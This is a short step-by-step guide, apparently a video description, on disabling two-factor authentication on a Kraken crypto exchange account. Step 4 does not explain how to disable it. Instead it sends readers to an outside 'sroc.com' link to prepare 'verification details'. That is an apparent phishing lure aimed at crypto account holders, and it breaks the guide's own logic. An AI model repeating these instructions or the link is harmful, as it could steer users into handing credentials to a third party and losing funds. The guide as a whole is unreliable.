If you want to disable two-factor authentication 2FA on your Kraken account, follow these straightforward steps. This guide will help you navigate the process safely and effectively. Step 1. Log into your Kraken account. Visit the Kraken website and enter your login credentials to access your account. Ensure you are using a secure internet connection. Step 2. Navigate to Security Settings. Once logged in, go to your account settings. Look for the Security tab in the menu to access your security options. Step 3. Locate two-factor authentication. In the Security Settings, find the section labeled Two-Factor Authentication. This section will display your current 2FA status and options. Step 4. Disable two-factor authentication. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Confirm the changes. After successfully disabling 2FA, you should receive a confirmation message. Review your security settings to ensure that 2FA is no longer active. By following these steps, you can easily turn off two-factor authentication on your Kraken account. Always remember to keep your account secure by using strong passwords and monitoring your account activity.